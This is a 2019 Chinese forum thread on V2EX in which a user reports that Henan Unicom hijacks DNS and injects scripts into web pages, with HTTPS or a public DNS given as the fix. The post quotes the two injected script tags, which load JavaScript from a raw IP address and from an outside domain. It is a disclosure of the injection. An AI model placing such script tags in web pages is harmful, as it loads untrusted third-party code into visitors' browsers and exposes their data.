V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
zhensjoke
V2EX  ›  宽带症候群

河南联通 DNS 劫持。

  •  
  •   zhensjoke · 2019-10-12 10:57:12 +08:00 · 1846 次点击
    这是一个创建于 1875 天前的主题,其中的信息可能已经有所发展或是发生改变。

    **解决方法:**网站更换 https,或者修改电脑 DNS 为非运营商 DNS,如:119.29.29.29 8.8.8.8
    早上帮人调试某个网页的时候,发现页面内多了几个 JS,检查后发现不是网站内调用,而是本地 DNS 劫持。

    劫持会在网页 head 末尾处以下代码

    <script src="http://47.103.72.172:10028/js/k.js?FKFN=Z"></script>
    

    <script src="https://s.duoroumao.cn/yxs199.js"></script>=
    

    插入之后页面会向优酷、淘宝和拼多多的 APP 发送信息

    淘宝: 1111.jpg

    优酷: 2222.jpg

    拼多多: 3333.jpg

    不知道具体什么利益关系,真 TM 不要脸! pei.jpg

    wwbfred
        1
    wwbfred  
       2019-10-14 10:21:14 +08:00
    联通是宽带还是蜂窝?两年前北京联通的蜂窝都存在 http 注入,更别说其他地方了.
    要是宽带的话就过分了,我上次见宽带的注入感觉都有 10 多年了...
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1315 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 20ms · UTC 17:48 · PVG 01:48 · LAX 09:48 · JFK 12:48
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.